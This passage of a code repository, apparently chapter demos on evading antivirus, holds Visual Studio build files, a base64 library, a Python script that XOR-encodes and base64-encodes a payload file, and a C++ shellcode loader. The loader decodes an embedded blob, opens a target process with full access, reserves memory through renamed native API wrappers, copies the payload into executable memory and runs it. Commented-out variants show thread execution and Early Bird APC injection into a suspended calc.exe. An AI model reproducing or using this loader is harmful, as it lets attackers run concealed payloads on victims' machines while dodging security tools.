    "content": "﻿  base64.cpp\r\n  demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配\r\n  正在生成代码\r\n  Previous IPDB not found, fall back to full compilation.\r\n  All 132 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.\r\n  已完成代码的生成\r\n  demo1.vcxproj -> C:\\Users\\Admin\\Desktop\\demo1\\x64\\Release\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|C:\\Users\\Admin\\Desktop\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo1/demo1.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "chapter4-demo1/enc.py",
    "content": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n    all=f.read()\r\n    array=[]\r\n    for i in all:\r\n        array.append(i^8)\r\n    #print(bytearray(array))\r\n    print(base64.b64encode(bytearray(array)))"
  },
  {
    "path": "chapter4-demo2/demo1/Debug/demo1.log",
    "content": "﻿  demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/Header.h",
    "content": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include <vector>\r\n\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,\r\n                                       (void*)0x0000000010000000,\r\n                                       (void*)0x0000000021000000,\r\n                                       (void*)0x0000000032000000,\r\n                                       (void*)0x0000000043000000,\r\n                                       (void*)0x0000000050000000,\r\n                                       (void*)0x0000000041000000,\r\n                                       (void*)0x0000000042000000,\r\n                                       (void*)0x0000000040000000,\r\n                                       (void*)0x0000000022000000 };"
  },
  {
    "path": "chapter4-demo2/demo1/base64.cpp",
    "content": "/*\n   base64.cpp and base64.h\n\n   base64 encoding and decoding with C++.\n   More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n   Version: 2.rc.08 (release candidate)\n\n   Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger\n\n   This source code is provided 'as-is', without any express or implied\n   warranty. In no event will the author be held liable for any damages\n   arising from the use of this software.\n\n   Permission is granted to anyone to use this software for any purpose,\n   including commercial applications, and to alter it and redistribute it\n   freely, subject to the following restrictions:\n\n   1. The origin of this source code must not be misrepresented; you must not\n\t  claim that you wrote the original source code. If you use this source code\n\t  in a product, an acknowledgment in the product documentation would be\n\t  appreciated but is not required.\n\n   2. Altered source versions must be plainly marked as such, and must not be\n\t  misrepresented as being the original source code.\n\n   3. 
This notice may not be removed or altered from any source distribution.\n\n   René Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include <algorithm>\n#include <stdexcept>\n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate <typename String, unsigned int line_length>\nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate <typename String>\nstatic 
std::string encode_pem(String s) {\n\treturn encode_with_line_breaks<String, 64>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks<String, 76>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate <typename String>\nstatic std::string decode(String encoded_string, bool 
remove_linebreaks) {\n\t//\n\t// decode(…) is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) &&  // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.'            // accept URL-safe base 64 strings, too, so check for '.' 
also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif  // __cplusplus >= 201703L\n"
  },
  {
    "path": "chapter4-demo2/demo1/base64.h",
    "content": "//\n//  base64 encoding and decoding with C++.\n//  Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include <string>\n\n#if __cplusplus >= 201703L\n#include <string_view>\n#endif  // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif  // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n"
  },
  {
    "path": "chapter4-demo2/demo1/demo1.cpp",
    "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n#include \"header.h\"\r\n#include \"base64.h\"\r\n#include \"nt.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\n\r\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\r\n\r\n{\r\n\tstd::string str = inStr;\r\n\tstd::string::size_type stStart = 0;\r\n\tstd::string::iterator iter = str.begin();\r\n\twhile (iter != str.end())\r\n\r\n\t{\r\n\t\tstd::string::size_type st = str.find(pSrc, stStart);\r\n\r\n\t\tif (st == str.npos)\r\n\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\titer = iter + st - stStart;\r\n\t\tstr.replace(iter, iter + strlen(pSrc), pReplace);\r\n\t\titer = iter + strlen(pReplace);\r\n\t\tstStart = st + strlen(pReplace);\r\n\t}\r\n\r\n\treturn str;\r\n\r\n}\r\n\r\nLPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)\r\n{\r\n\tMEMORY_BASIC_INFORMATION mbi;\r\n\r\n\tfor (auto base : VC_PREF_BASES) {\r\n\t\tVirtualQueryEx(\r\n\t\t\thProc,\r\n\t\t\tbase,\r\n\t\t\t&mbi,\r\n\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t);\r\n\r\n\t\tif (MEM_FREE == mbi.State) {\r\n\t\t\tuint64_t i;\r\n\t\t\tfor (i = 0; i < cVmResv; ++i) 
{\r\n\t\t\t\tLPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));\r\n\t\t\t\tVirtualQueryEx(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentBase,\r\n\t\t\t\t\t&mbi,\r\n\t\t\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t\t\t);\r\n\t\t\t\tif (MEM_FREE != mbi.State)\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif (i == cVmResv) {\r\n\t\t\t\t// found suitable base\r\n\t\t\t\treturn base;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn nullptr;\r\n}\r\n\r\nint main()\r\n{\r\n\r\n\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"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@@\";\r\n\r\n\tstd::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest3_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\r\n\r\n\tHANDLE hProc = OpenProcess(\r\n\t\tPROCESS_ALL_ACCESS,\r\n\t\tFALSE,\r\n\t\t8236\r\n\t);\r\n\r\n\tSYSTEM_INFO sys_inf;\r\n\tGetSystemInfo(&sys_inf);\r\n\r\n\tDWORD page_size{ sys_inf.dwPageSize };\r\n\tDWORD alloc_gran{ sys_inf.dwAllocationGranularity };\r\n\r\n\tSIZE_T szVmResv{ alloc_gran };\r\n\tSIZE_T szVmCmm{ page_size };\r\n\tDWORD  cVmResv = (rest2_decoded.length() / szVmResv) + 1;\r\n\tDWORD  cVmCmm = szVmResv / szVmCmm;\r\n\r\n\tLPVOID vmBaseAddress = GetSuitableBaseAddress(\r\n\t\thProc,\r\n\t\tszVmCmm,\r\n\t\tszVmResv,\r\n\t\tcVmResv\r\n\t);\r\n\tLPVOID    currentVmBase{ vmBaseAddress };\r\n\tNTSTATUS  status{ 0 };\r\n\tvector<LPVOID>  vcVmResv;\r\n\r\n\t//alloc memeory\r\n\tfor (int i = 1; i <= cVmResv; ++i)\r\n\t{\r\n\t\t\r\n\t\tstatus = BNtAVM(\r\n\t\t\thProc,\r\n\t\t\t&currentVmBase,\r\n\t\t\tNULL,\r\n\t\t\t&szVmResv,\r\n\t\t\tMEM_RESERVE,\r\n\t\t\tPAGE_NOACCESS\r\n\t\t);\r\n\t\tif (STATUS_SUCCESS == status) {\r\n\t\t\tvcVmResv.push_back(currentVmBase);\r\n\t\t}\r\n\t\telse {\r\n\r\n\t\t\tstd::cout << \"AVM error\";\r\n\t\t}\r\n\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);\r\n\t}\r\n\r\n\tDWORD           offsetSc{ 0 
};\r\n\tDWORD           oldProt;\r\n\r\n\tdouble prcDone{ 0 };\r\n\r\n\tDWORD     cmm_i;\r\n\tfor (int i = 0; i < cVmResv; ++i)\r\n\t{\r\n\t\tunsigned char* sc = new unsigned char[szVmCmm];\r\n\t\tfor (int j = 0; j < szVmCmm; j++) {\r\n\t\t\t//cout << szVmCmm * i + j << endl;\r\n\t\t\tsc[j] = S[szVmCmm * i + j] ^ XOR_KEY;\r\n\t\t}\r\n\r\n\t\tvoid* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tmemcpy(exec, sc, rest2_decoded.length());\r\n\r\n\t\t((void(*)())exec)();\r\n\r\n\r\n\t\t/*\r\n\t\tfor (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)\r\n\t\t{\r\n\r\n\t\t\tDWORD offset = (cmm_i * szVmCmm);\r\n\t\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);\r\n\r\n\t\t\tstatus = BNtAVM(\r\n\t\t\t\thProc,\r\n\t\t\t\t&currentVmBase,\r\n\t\t\t\tNULL,\r\n\t\t\t\t&szVmCmm,\r\n\t\t\t\tMEM_COMMIT,\r\n\t\t\t\tPAGE_READWRITE\r\n\t\t\t);\r\n\r\n\r\n\t\t\tSIZE_T szWritten{ 0 };\r\n\t\t\t\r\n\t\t\t\tstatus = BNtWVM(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentVmBase,\r\n\t\t\t\t\t&sc[offset],\r\n\t\t\t\t\tszVmCmm,\r\n\t\t\t\t\t&szWritten\r\n\t\t\t\t);\r\n\t\t\t\r\n\r\n\t\t\toffsetSc += szVmCmm;\r\n\r\n\t\t\tstatus = BNtPVM(\r\n\t\t\t\thProc,\r\n\t\t\t\t&currentVmBase,\r\n\t\t\t\t&szVmCmm,\r\n\t\t\t\tPAGE_EXECUTE_READ,\r\n\t\t\t\t&oldProt\r\n\t\t\t);\r\n\t\t}*/\r\n\r\n\r\n\t\r\n\t}\r\n\r\n\r\n\r\n\r\n\t/*\r\n\tfor (int i = 0; i < rest2_decoded.length(); i++) {\r\n\r\n\t\tsc[i] = S[i] ^ 8;\r\n\t}\r\n\r\n\r\n\r\n\t\r\n\tfor (int i=0; i < rest2_decoded.length(); i++) {\r\n\t\r\n\t\tsc_rev[i] = sc[rest2_decoded.length() - i-1];\r\n\t\r\n\t}*/\r\n\r\n\t/*\r\n\r\n\t\r\n\tvoid * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tmemcpy(exec, sc_rev, rest2_decoded.length());\r\n\t\r\n\t\r\n\r\n\t//unsigned const char* S=\r\n\r\n\t((void(*)())exec)();\r\n\t*/\r\n\r\n\t/*\r\n\tCreateThread \r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL,    \r\n\t\t0,      \r\n\t\t(LPTHREAD_START_ROUTINE)exec, \r\n\t\tNULL, 
\r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\t/*\r\n\teariler bird APC\r\n\r\n\tSIZE_T shellSize = szSc;\r\n\tSTARTUPINFOA si = { 0 };\r\n\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\tHANDLE victimProcess = pi.hProcess;\r\n\tHANDLE threadHandle = pi.hThread;\r\n\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\tWriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);\r\n\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\tResumeThread(threadHandle);\r\n\t*/\r\n\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n//   1. Use the Solution Explorer window to add/manage files\r\n//   2. Use the Team Explorer window to connect to source control\r\n//   3. Use the Output window to see build output and other messages\r\n//   4. Use the Error List window to view errors\r\n//   5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n//   6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/demo1.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <RootNamespace>demo1</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  
